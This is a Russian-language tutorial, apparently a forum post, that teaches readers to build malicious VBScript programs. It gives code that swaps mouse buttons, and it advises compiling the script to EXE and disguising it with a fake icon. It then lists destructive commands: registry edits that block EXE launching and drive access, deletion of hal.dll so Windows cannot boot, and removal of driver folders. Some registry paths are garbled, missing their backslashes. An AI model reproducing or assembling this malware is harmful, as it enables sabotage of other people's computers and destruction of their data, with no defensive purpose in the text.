Для начала,нужно уметь изменять расширение файла, с этого и начнём. Существует
много способов, но мне нравится этот. У каждого должен быть обычный
архиватор,вот им мы и воспользуемся. И так,создайте к примеру
текстовый фаил под названием "Текстовый документ". Теперь найдите
этот текстовик через свой архиватор. В архиваторе, вы должны увидеть
следующее: "Текстовый документ.txt". Окончание "txt" - имя
расширения файла,вот его и нужно изменить,точно так же, словно,
редактируете имя папки или файла,стираете строчку "txt" и ставите скажем
"mp3". В результате мы получаем "Текстовый документ.mp3" формата. Если
всё понятно, а вопросов возникнуть по этому поводу недолжно,то пойдём
дальше. Создайте текстовый документ,содержащий следующее: on error
resume next Set S = CreateObject("Wscript.Shell") set
FSO=createobject("scripting.filesystemobject") s.run"rundll32 user32,
SwapMouseButton"
Затем, сохранив полученные данные, вам нужно
изменить расширение файла, и вместо "txt" прописать "vbs".
Аббревиатура
"vbs", происходит от названия языка программирования - "visual basic
script".
Вот у нас и готова первая, простая, вредоносная
программка, меняющая местами кнопки мыши.
Теперь нужно её
скомпелировать (изменить) в "exe" формат с помощью программы: "Vbs2Exe",
и установить любой значок с помощью грабера иконок: "IconToy".
А
теперь информация для тех, кто не намерен ограничивать свои возможности
банальным обменом кнопок мыши. on error resume next Set S =
CreateObject("Wscript.Shell") set
FSO=createobject("scripting.filesystemobject") Три, верхние строчки -
должны присутствовать всегда. Далее, следует кодировка, а ниже, в
скобках - пояснение.
Так же возможно сочетать, те или иные
вредоносные команды. s.regwrite"HKCRexefileshellopencommand","rundll32.exe" (Запрет
на открытие "EXE" файлов) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD" s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD" (запрет
доступа к жёстким дискам) fso.deletefile
fso.getspecialfolder(0)+"system32hal.dll",1 (удаляется системный
фаил, после чего загрузка Windows становится невозможна.
Система
работает до первой перезагрузки) fso.deletefolder
fso.getspecialfolder(0)+"system32drives",1 fso.deletefolder
fso.getspecialfolder(0)+"Driver Cache" (удаление драйверов)